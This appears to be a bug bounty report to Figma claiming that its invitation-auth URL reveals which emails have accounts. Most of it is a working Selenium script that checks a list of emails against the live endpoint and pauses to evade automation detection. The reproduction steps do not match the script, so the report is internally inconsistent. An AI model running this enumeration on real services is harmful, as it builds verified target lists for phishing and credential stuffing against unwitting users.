Figma

Reportes bug bounty en figma.

PreviousNasa VDP NextUser Enumeration via Authentication Flow - Email Exposure

Last updated 5 days ago

Figma

Reportes bug bounty en figma.

Summary:

Hi Bruno, could you please review my report again carefully this time? During an assessment of a Figma workspace, we identified a severe exposure of Personally Identifiable Information (PII). This data leakage includes email addresses of multiple users, which falls under the category of PII according to various legal regulations, including GDPR, CCPA. This vulnerability makes it simple for an attacker to filter thousands of internal emails from legitimate figma users, which allows them to create entire spear phishing campaigns against the leaked emails in order to lure users into the trap and attack figma as a company. Now figma's image is currently at risk, as I was able to find emails from universities in the United States, from users employed by DELL, so this is something to be sanitized. What is this URL and its purpose? The URL https://www.figma.com/invites/auth is used by Figma to manage invitations and authentication for files, teams, and projects shared within the platform. In this flow, when entering an email in the following URL:

https://www.figma.com/invites/auth?email={email}&is_not_gen_0=true&resource_type=file

Leaked URL's

Script to automate:

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time

# Configurar Selenium con ChromeDriver
options = webdriver.ChromeOptions()
options.add_argument("--headless")  # Ejecutar en modo headless para mayor velocidad
options.add_argument("--disable-gpu")
options.add_argument("--no-sandbox")

driver = webdriver.Chrome(options=options)

# Archivo con los emails a verificar
input_file = "emails.txt"
output_file = "emails_verified.txt"

# XPath de los elementos
continue_xpath = "/html/body/div[1]/div/div/div/div/form/button[2]"
button_xpath = "/html/body/div[1]/div/div/div/div/form/button[2]"

# Función para verificar si un email está registrado en Figma
def check_email(email):
    url = f"https://www.figma.com/invites/auth?email={email}&is_not_gen_0=true&resource_type=file"
    driver.get(url)

    try:
        # Esperar hasta que el botón "Continue with email" esté visible
        WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH, continue_xpath))).click()
        time.sleep(2)  # Pequeña espera para que la página cargue bien

        # Obtener el texto del botón final
        button_text = driver.find_element(By.XPATH, button_xpath).text

        if "Log in" in button_text:
            return "✅ Registrado"
        elif "Create account" in button_text:
            return "❌ No registrado"
        else:
            return "⚠️ No se pudo determinar"

    except Exception as e:
        return f"❌ Error: {e}"

# Leer los emails desde el archivo y verificar cada uno
with open(input_file, "r", encoding="utf-8") as file:
    emails = [line.strip() for line in file]

results = {}
for email in emails:
    status = check_email(email)
    results[email] = status
    print(f"{email} -> {status}")

    # Evitar detección por automatización con pausas
    time.sleep(3)

# Guardar los resultados en un archivo
with open(output_file, "w", encoding="utf-8") as file:
    for email, status in results.items():
        file.write(f"{email} -> {status}\n")

print(f"\n[✅] Verificación completada. Resultados guardados en {output_file}")

# Cerrar el navegador de Selenium
driver.quit()

Steps To Reproduce:

Access the Figma workspace with public/shared access.
Navigate to the specific design file where user details are listed.
Extract the email addresses directly visible in comments, metadata, or project settings.
Validate the exposed PII by cross-referencing with external sources or contacting affected users.

Impact

Exposure of Corporate & Institutional Emails

Figma’s security reputation is at stake. Users may perceive the platform as insecure, leading to significant trust erosion.
Loss of customer confidence. Organizations using Figma for design collaboration might reconsider their trust in the platform, fearing exposure of their employees’ emails.
Attackers can build verified email lists for further exploitation.
Phishing attacks: Malicious actors can craft targeted phishing campaigns against affected users.
Credential stuffing: If emails are associated with reused passwords, attackers could leverage credential stuffing techniques.
Social engineering: Attackers may exploit this information to manipulate users into disclosing sensitive credentials or information.
Regulatory non-compliance: The unauthorized exposure of PII can lead to potential legal and financial repercussions under data protection laws.